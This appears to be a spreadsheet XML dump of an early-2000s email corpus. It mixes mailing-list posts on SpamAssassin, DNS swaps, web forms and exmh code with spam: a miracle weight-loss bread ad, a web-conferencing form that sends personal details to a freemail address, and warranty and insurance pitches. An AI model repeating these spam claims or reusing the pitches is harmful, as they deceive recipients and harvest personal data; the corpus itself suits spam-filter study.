 Install the unstable versions
 Change /etc/apt/sources.list
 Run apt-get update
 Quentin Krengel
 Krengel Technology Inc
 -----Original Message-----
 From: spamassassin-talk-admin@example.sourceforge.net
 [mailto:spamassassin-talk-admin@lists.sourceforge.net] On Behalf Of
 Tanniel Simonian
 Sent: Wednesday, September 11, 2002 4:15 PM
 To: spamassassin-talk@example.sourceforge.net
 Subject: [SAtalk] Debianized Packages for SA 2.3+
 Im currently using woody.
 Is there a debianized package for SA on Woody, or at least somewhere I
 can download from? Its been soo long that I haven't compiled stuff, that
 Im sort of shy to try again. =)
 -- 
 Tanniel Simonian
 Programmer / Analyst III
 UCR Libraries
 http://libsys.ucr.edu
 909 787 2832
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/ _______________________________________________
 Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
 -------------------------------------------------------
 In remembrance
 www.osdn.com/911/
 _______________________________________________
 Spamassassin-talk mailing list
 Spamassassin-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Tiny DNS Swap
</t>
  </si>
  <si>
    <t xml:space="preserve">(This list is sponsored by Ironclad Networks http://www.ironclad.net.au/)
 Hello!
 Friday, August 30, 2002, 7:25:31 PM Bob Musser &lt;BobM@dbsinfo.com&gt; wrote:
 [lost]
 BM&gt; I'd like to swap with someone also using Simple DNS to take
 BM&gt; advantage of the trusted zone file transfer option.
                      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 Are you speaking about limiting AXFR requests on IP address basis? If
 yes, then virtually every BIND-equipped DNS server in the world will
 be suitable for your needs.
 -- 
 Yours sincerely,
 Andrey G. Sergeev (AKA Andris)     http://www.andris.msk.ru/
 --
 To Unsubscribe: &lt;dns-swap-off@lists.ironclad.net.au&gt;
 Sponsor &amp; Host: Ironclad Networks &lt;http://www.ironclad.net.au/&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 2000 Year old bread recipe actually helps you lose weight!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;Hunza Bread&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;H2&gt;
 &lt;CENTER&gt;Hunza Bread&lt;/CENTER&gt;&lt;/H2&gt;
 &lt;P&gt;Home made Hunza Bread is a simple, delicious and nutritious bread that is easily 
 prepared in just 5 minutes  using a few ingredients that have 
 always been universally available. The taste of this bread is wonderful.
 &lt;P&gt;HUNZA BREAD Miraculously Stops Your Appetite And Hunger and is based on a 2000 
 year old recipe
 &lt;P&gt;The Hunzas are considered to be the healthiest people on earth. This bread is the 
 main part of their diet.
 &lt;P&gt;&lt;A href="http://211.117.193.159/bread1/124.html"&gt;CLICK HERE&lt;/A&gt; to learn more about 
 these  astounding people and their delicious, 
 nutritious and easy to prepare home made health bread that suppresses  your appetite. 
 &lt;/P&gt;&lt;p&gt;&lt;br&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lower your company phone bill every month!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;New Web Technology&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#EAEAAE leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DMicrosoft, Sans Sarif&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D560 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#42426F size=3D6&gt;UNLIMITED WEB CON=
 FERENCING&lt;/font&gt;&lt;/b&gt;
       &lt;HR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;Subscribe to the Web Conference C=
 enter for only $40.00 per month!
 &lt;/FONT&gt;
 &lt;br&gt;
 &lt;FONT color=3D#42426F size=3D3&gt;(Connects up to 15 participants at a time p=
 lus audio charges)&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;P&gt;
 &lt;TABLE width=3D475 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#2F2F4F size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;Conduct real-time interactive meetings and presentations&lt;br&gt; ove=
 r the Internet 
       &lt;LI&gt;Application sharing
       &lt;LI&gt;Review and revise documents in real-time
       &lt;LI&gt;Record and archive your meeting 
       &lt;LI&gt;Simulate a live Classroom
       &lt;LI&gt;Quickly hold a meeting with anyone anywhere in the world
       &lt;LI&gt;Lowest rate $.18 per minute for audio (toll charges&lt;br&gt; included=
 ) Call anytime, from anywhere, to anywhere
       &lt;LI&gt;Quality, easy to use service&lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/=
 TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3D"left"&gt;&lt;FONT color=3D#42426F size=3D4&gt;&lt;B&gt;FREE DEMO&lt;/B&gt;&lt;/fo=
 nt&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;FONT color=3D#42426F size=3D5&gt;&lt;B&gt;Eliminate or Reduce Travel Expense&lt;/b&gt;&lt;/=
 font&gt;
 &lt;BR&gt;&lt;FONT color=3D#2F2F4F size=3D4&gt;&lt;B&gt;
 Try this on for savings... 
 and turn those unnecessary trips into problem solving and fact finding con=
 ferences, 
 saving time and wear and tear on your overworked business staff. 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#42426F size=3D4&gt;To find out more abo=
 ut this revolutionary concept,
 fill out the form below.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#2F2F4F size=3D2&gt;&lt;b&gt;Required Input Field&lt;FONT color=3D#5C=
 4033 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/b&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:inbocks1808@firemail.com?subject=3DWebC_Inquir=
 y 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F
           size=3D2&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Web 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Company 
             Name&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;
             State&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Business 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Home 
             Phone&lt;/b&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#2F2F4F size=3D2=
 &gt;&lt;b&gt;Email 
             Address&lt;/b&gt;&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#5C4033
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;INPUT type=3Dsubmit value=3D"Submit Information" name=3Dsubmit&gt; 
     &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;TABLE width=3D350&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000000 size=3D1&gt;&lt;b&gt;All information g=
 iven herein is strictly confidential and will not be re-distributed
       for any reason other than for the specific use intended.&lt;/font&gt;&lt;/b&gt;&lt;=
 br&gt;
       &lt;FONT face=3D"Arial, Helvetica, sans-serif" color=3D#000000
       size=3D1&gt;To be removed from our distribution lists, please  
       &lt;A href=3D"mailto:inbocks1812@firemail.com?subject=3DRemove_WebC"&gt;Cl=
 ick 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;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</si>
  <si>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I'll agree that webforms are a pain in the ass, however it would seem to 
 me that the problem with passport is the same one you noted with the 
 autoform function, providing more info than you want to.  That and some 
 entity would be holding the passport info, thus have all that data in the 
 first place.
 Personally i'd never trust them not to at least use it internally to 
 market to me, if not sell/rent out.  Just think of the ability 
 they'd have to build a profile for you since everything you went to was 
 tracked to you.  And thats just the marketing side of it.
 Chris
 On Sat, 28 Sep 2002, Gregory Alan Bolcer wrote:
 &gt; What's wrong with doing business over the Web?  Web forms.  There's
 &gt; promising replacements forms, but this is the current state of the
 &gt; industry:
 &gt; 
 &gt;  o You find something that you want to fill out.  It's a partnership form,
 &gt;    a signup for a Web seminar, a request for more information, anything.
 &gt;  o You start wasting time typing in all those stupid fields and spend
 &gt;    about 10 minutes going through all their stupid qualification hoops
 &gt;    just to get a small piece of information , whitepaper, or a callback
 &gt;    when halfway through, you start to wonder if it's really worth your
 &gt;    time to forever be stuck on their stupid prospect list. 
 &gt;  o Pull down tags are never put in order of use instead of alphabetized.
 &gt;    I was on a site just now that had every single country in the world
 &gt;    listed; the selection of your country was absolutely critical for you
 &gt;    to hit submit, but due to the layout, the "more&gt;" tag on the second
 &gt;    row was offscreen so it was impossible to select any country except
 &gt;    about two dozen third world countries. 
 &gt;  o Even worse, ever time you hit submit, all forms based things complain
 &gt;    about using the universal country phone number format and will cause
 &gt;    you to re-enter dashes instead of dots.
 &gt;  o When you get something that's not entered right, you will go back and
 &gt;    enter it right, but then some other field or most likely pulldown will
 &gt;    automatically get reset to the default value so that you will have to
 &gt;    go back and resent that freaking thing too.  Finally after all combinations
 &gt;    of all pulldowns, you may get a successful submit.
 &gt;  o You wait freaking forever just to get a confirmation.  
 &gt;  o Sometimes, like today, you won't be able to ever submit anything due
 &gt;    to it being impossible to ever submit a valid set of information that
 &gt;    is internally non-conflicting according to whatever fhead wrote their
 &gt;    forms submission.
 &gt; 
 &gt; What's wrong with this picture?  The company is screwing you by wasting
 &gt; your time enforcing their data collection standards on you.  I'm sure there's
 &gt; someone in that company that would be willing to accept "US", "U.S", "USA"
 &gt; "United States", "U of A", "America", etc. and would know exactly which
 &gt; freaking country the interested party was from instead of forcing them
 &gt; to waste even more time playing Web form geography.  
 &gt; 
 &gt; I'm starting to see the light of Passport.  You want more information?  Hit
 &gt; this passport button.  Voila.  IE6 and Netscape 6,7 have pre-forms sutff,
 &gt; but I always turn it off because you never know when there's that one field
 &gt; that you don't want to submit to the person you are submitting to that 
 &gt; automatically gets sent, i.e. the privacy stuff is well beyond the 
 &gt; average user who will get screwed on privacy stuff.  
 &gt; 
 &gt; So, if crappy forms-based submission is the state of practice for
 &gt; business enablement on the Web, I can't see this whole data submission
 &gt; and hurry up and wait for us to get back to you business process as
 &gt; working all that well.
 &gt; 
 &gt; 
 &gt; Greg
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Auto Protection
</t>
  </si>
  <si>
    <t xml:space="preserve">Protect Yourself.
 Purchase An Extended Warranty For Your Car Before
 Your Existing Warranty Expires And Save Hundreds.
 Even if your warranty has expired, you will save
 40-60 percent over the warranties offered by
 dealerships and it's the SAME warranty.
 All quotes are 100 percent free.
 All quotes are obligation free.
 Dear Friend,
 Car troubles always seem to happen at the worst
 possible time. Protect yourself and your family
 with a quality Extended Warranty for your car,
 truck, or SUV, so that a large expense cannot hit
 you all at once. We cover most vehicles with less
 than 150,000 miles.
 Do not buy from a dealer. Their prices are often
 40-60 percent MORE!
 We offer fair prices and prompt, toll-free claims
 service. Get an Extended Warranty on your car
 today. YOU WILL BE SURPRISED BY HOW INEXPENSIVE
 THIS PROTECTION CAN BE!
 Warranty plans also include, for free:
 1. 24-Hour Roadside Assistance
 2. Rental Benefit
 3. Trip Interruption Intervention
 4. Extended Towing Benefit
 Take advantage of our special offer, before it
 expires, by going to:
 &lt;a href="http://redirect.metropol.dk/cgi-bin/redirect.pl?molid=rel&amp;url=211.167.74.101/auto/"&gt;Click_Here&lt;/a&gt;
 http://redirect.metropol.dk/cgi-bin/redirect.pl?molid=rel&amp;url=211.167.74.101/auto/
 Sincerely,
 S.C. Valentine
 EWFC, Inc.mrcztbxlwuukwxoqgwyaszncexlqcdpeljuytjzytmeuaivyfpvcranyqyygjyaiajphjoimfahyolykergzuvbpadgopxivbdvonbalwnjrmpfhtxumhztfv
 __________________________________________________________________
 The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp 
 Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; From: yyyy@example.com [mailto:yyyy@example.com]
 &gt; Sent: Tuesday, September 17, 2002 9:50 AM
 &gt; &gt; ... we've been fighting the War on Terrorism for as long
 &gt; &gt; as there's been commerce, so you'd think we'd /realize/ that
 &gt; &gt; escalation of violence is not a solution.
 &gt; 
 &gt; Well said!
 &gt; 
 &gt; --j.
 Yeah.  It certainly wasn't a solution to the Carthaginian problem or the
 Barbary Pirates.  Wait ... no ... actually ... it was a rather permanent
 solution.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Peruvian congressman has challenged his Vice President to a duel.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8268032,1717/
 Date: 2002-09-26T08:22:37+01:00
 [IMG: http://www.newsisfree.com/Images/fark/yahoonews.gif ([Yahoo])]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt;Robert Elz said:
  &gt;     Date:        Wed, 28 Aug 2002 09:22:34 -0500
  &gt;     From:        Chris Garrigues &lt;cwg-dated-1030976555.34ad5b@DeepEddy.Co
 m&gt;
  &gt;     Message-ID:  &lt;1030544555.28815.TMDA@deepeddy.vircio.com&gt;
  &gt; 
  &gt; 
  &gt;   | so I'll probably poke around at the sequences performance issues,
  &gt; 
  &gt; Well, there's this wonderful piece of code in MhSeqExpand ...
  &gt; 
  &gt;     # Hack to weed out sequence numbers for messages that don't exist
  &gt;     foreach m $rseq {
  &gt;         if ![file exists $mhProfile(path)/$folder/$m] {
  &gt;             Exmh_Debug $mhProfile(path)/$folder/$m not found
  &gt;             set ix [lsearch $seq $m]
  &gt;             set seq [lreplace $seq $ix $ix]
  &gt;         } else {
  &gt;             # Real hack
 At least I'm up-front about my hacks :-)
  &gt;             break
  &gt;         }
  &gt;     }
  &gt; 
  &gt; which is going to run slow if a sequence happens to start with a bunch
  &gt; of messages that don't exist.   I'm not sure why it is important that the
  &gt; first message in the sequence returned exists, but not necessarily any
  &gt; of the others, but I'm sure glad it is, as MhSeqExpand gets called lots,
  &gt; and I don't know if I could cope if it were checking every file in the
  &gt; sequences it is looking at, all the time...
 That was my thinking.  My recollection about the first message being valid
 is that the ftoc code wants to find that message to start its highlighting,
 for example, or you are selecting a message to display.
  &gt; It may help to keep a list of the valid message numbers for the current
  &gt; folder (though that would then need to be verified against changes to the
  &gt; directory).   Does tcl have a directory read function?   I assume so...
 glob -nocomplain $mhProfile(path)/$folder *
 will return an unsorted list of the directory's contents.
 But the thought of keeping an in memory list of valid messages is not fun.
 Exmh already maintains in-core lists of messages in sequences, which is
 already pretty tricky
  &gt; Mh_Sequence also goes and rereads the files (.mh_sequences and the
  &gt; context file) but I'm not sure how frequently that one is called.
 In some places I maintain caches of files by checking their modify time,
 but the sequence files are soo small that by the time you stat them to
 check their date stamp, you could just read them again.  Also, now that
 we checkpoint message state on every message view, that file will change
 every time.  In the old days exmh used to cache a bunch of state about
 the folder.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</si>
  <si>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Subject: wifi progress
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Well it looks pretty much 99% sure that we will be moving in on Nov 1 to
 the new house. I think the only thing that stops us now are acts of
 dieties and total economic collapse..so no one mention the dow for the
 next few weeks..
 In preperation we drove to Best Buy tonight and picked up the test core
 for the wifi net. I got a linksys BEFW11S4(1) for the router/hub/wireless
 ap/firewall/etc and a linksys wifi pcmcia card for the laptop
 I made one false move so it took about 30 mins all told to set up the
 card, the router, and the other 3 machines in the house on the wire ether
 hub. All vfery neat very easy and very very cool set up via the
 webinterface. I have to dig into the firewall/nat/routing features some
 more (i have been reading up the wifi security blackpaper on ars technica)
 but all in all a smooth move.
 Now the place im at now, the house soon to be the ex house, has lots of
 funky things going on in the walls and in the area. We are in ,
 essentialy, a gravel pit..recption of all types suck and transmisions get
 goofy inside the pit.  That being said... with 2 walls and 40 feet between
 the AP and the pcmica card (no external antena on it) Im still getting
 11mbs and at least 60% goodness.
 Some cool things about the new house...its a 1912 job so no metal works
 inthe walls to speak of , mostly wood and plaster. We dont have a
 microwave and our cordless phines are on 900mhz (yea so I can use my bear
 cat to listen in on some calls, with kids in the house is that such a bad
 thing? Ben or heather, if you read this years from now...well by then I
 hope youare better at countermoeasures:)- )
 Ok, enough testing for tonight. I gota say, being able to do this in bed
 by vncing via wifi to my desktop is a blast...oh no...wifes pillow is
 heading this way....DUCKKKKK
 (1)http://www.linksys.com/Products/product.asp?grid=23&amp;prid=173
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: HD/ID: High-Def Independence Day
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-07-24 at 07:09, Justin Mason wrote:
 &gt; 
 &gt; "Gordon Mohr" said:
 &gt; 
 &gt; &gt; I still think self-add whitelists are underrated. 
 &gt; &gt; A FoRK whitelist would presumably start with
 &gt; &gt; all subscribers, and grow from there. Bouncing
 &gt; &gt; problem mail, in a way that humans can understand
 &gt; &gt; how to whitelist themselves for a resend, avoids 
 &gt; &gt; the problem of silent failures without opening the 
 &gt; &gt; door to lazy, forged-"from" spammers. 
 &gt; 
 &gt; Big problem I see with this system, is the
 &gt; automatically-generated-but-important mails like online tickets,
 &gt; bills, etc.
 Besides lists, this is the reason I can't use such a system. I get more
 than a few mails from 'dont-respond-to-this-address@' password reminder
 generators, for example. SpamAssassin does flag a few of those as spam,
 but at least I've still got them.
 Luis
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Second-hand sales blamed for bedbugs' comeback
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-6,8582593,1440/
 Date: Not supplied
 The popularity of garage or car-boot sales could be behind a recent worldwide 
 resurgence of the nuisance bugs, says a UK scientist
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The subtle art of sugaring bitter pills goes down well
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8456085,215/
 Date: 2002-10-02T03:57:00+01:00
 *Politics:* For the Labour leader in trouble there are usually two ways out. 
 Faced with a restless party, you can either cave in or stand firm, writes *
 Jonathan Freedland*.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fall in value of mortgages indicates housing slowdown
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8276089,215/
 Date: 2002-09-26T13:42:55+01:00
 *Money:* Further evidence of a slowdown in the housing market emerged today as 
 figures revealed a 15% drop in the total value of mortgages approved during 
 August.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Life Insurance - Why Pay More?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META content=3D"text/html; charset=3Dwindows-1252" http-equiv=3DContent-T=
 ype&gt;
 &lt;META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;&lt;!-- Inserted by Calypso --&gt;
 &lt;TABLE border=3D0 cellPadding=3D0 cellSpacing=3D2 id=3D_CalyPrintHeader_ r=
 ules=3Dnone 
 style=3D"COLOR: black; DISPLAY: none" width=3D"100%"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3D3&gt;
       &lt;HR color=3Dblack noShade SIZE=3D1&gt;
     &lt;/TD&gt;&lt;/TR&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3D3&gt;
       &lt;HR color=3Dblack noShade SIZE=3D1&gt;
     &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;!-- End Calypso --&gt;&lt;!-- Inserted by Calypso=
  --&gt;&lt;FONT 
 color=3D#000000 face=3DVERDANA,ARIAL,HELVETICA size=3D-2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;=
 /TR&gt;&lt;/TABLE&gt;&lt;!-- End Calypso --&gt;&lt;FONT color=3D#ff0000 
 face=3D"Copperplate Gothic Bold" size=3D5 PTSIZE=3D"10"&gt;
 &lt;CENTER&gt;Save up to 70% on Life Insurance.&lt;/CENTER&gt;&lt;/FONT&gt;&lt;FONT color=3D#ff=
 0000 
 face=3D"Copperplate Gothic Bold" size=3D5 PTSIZE=3D"10"&gt;
 &lt;CENTER&gt;Why Spend More Than You Have To?
 &lt;CENTER&gt;&lt;FONT color=3D#ff0000 face=3D"Copperplate Gothic Bold" size=3D5 PT=
 SIZE=3D"10"&gt;
 &lt;CENTER&gt;Life Quote Savings
 &lt;CENTER&gt;
 &lt;P align=3Dleft&gt;&lt;/P&gt;
 &lt;P align=3Dleft&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/U&gt;&lt;/I&gt;&lt;/B&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/U&gt;&lt;/B&gt;&lt;/U&gt;&lt;/I&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;CENTER&gt;
 &lt;TABLE border=3D0 borderColor=3D#111111 cellPadding=3D0 cellSpacing=3D0 wi=
 dth=3D650&gt;
   &lt;TBODY&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE border=3D0 borderColor=3D#111111 cellPadding=3D5 cellSpacing=3D0 wi=
 dth=3D650&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD colSpan=3D2 width=3D"35%"&gt;&lt;B&gt;&lt;FONT face=3DVerdana size=3D4&gt;Ensurin=
 g your 
       family's financial security is very important. Life Quote Savings ma=
 kes 
       buying life insurance simple and affordable. We Provide FREE Access =
 to The 
       Very Best Companies and The Lowest Rates.&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle vAlign=3Dtop width=3D"18%"&gt;
       &lt;TABLE borderColor=3D#111111 width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD style=3D"PADDING-LEFT: 5px; PADDING-RIGHT: 5px" width=3D"100=
 %"&gt;&lt;FONT 
             face=3DVerdana size=3D4&gt;&lt;B&gt;Life Quote Savings&lt;/B&gt; is FAST, EAS=
 Y and 
             SAVES you money! Let us help you get started with the best val=
 ues in 
             the country on new coverage. You can SAVE hundreds or even tho=
 usands 
             of dollars by requesting a FREE quote from Lifequote Savings. =
 Our 
             service will take you less than 5 minutes to complete. Shop an=
 d 
             compare. SAVE up to 70% on all types of Life insurance! 
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;&lt;BR&gt;&lt;BR&gt;
           &lt;TD height=3D50 style=3D"PADDING-LEFT: 5px; PADDING-RIGHT: 5px" 
           width=3D"100%"&gt;
             &lt;P align=3Dcenter&gt;&lt;B&gt;&lt;FONT face=3DVerdana size=3D5&gt;&lt;A 
             href=3D"http://website.e365.cc/savequote/"&gt;Click Here For Your=
             Free Quote!&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;P&gt;&lt;FONT face=3DVerdana size=3D4&gt;&lt;STRONG&gt;
           &lt;CENTER&gt;Protecting your family is the best investment you'll eve=
 r 
           make!&lt;BR&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P align=3Dleft&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif" size=3D2=
 &gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;/P&gt;
       &lt;CENTER&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
       &lt;P&gt;&lt;/P&gt;
       &lt;P align=3Dleft&gt;&lt;BR&gt;&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/P&gt;
       &lt;P align=3Dcenter&gt;&lt;BR&gt;&lt;/P&gt;
       &lt;P align=3Dleft&gt;&lt;BR&gt;&lt;/B&gt;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;If you are in receipt of this=
  email 
       in error and/or wish to be removed from our list, &lt;A 
       href=3D"mailto:coins@btamail.net.cn"&gt;PLEASE CLICK HERE&lt;/A&gt; AND TYPE =
 REMOVE. If you 
       reside in any state which prohibits e-mail solicitations for insuran=
 ce, 
       please disregard this 
       email.&lt;BR&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR=
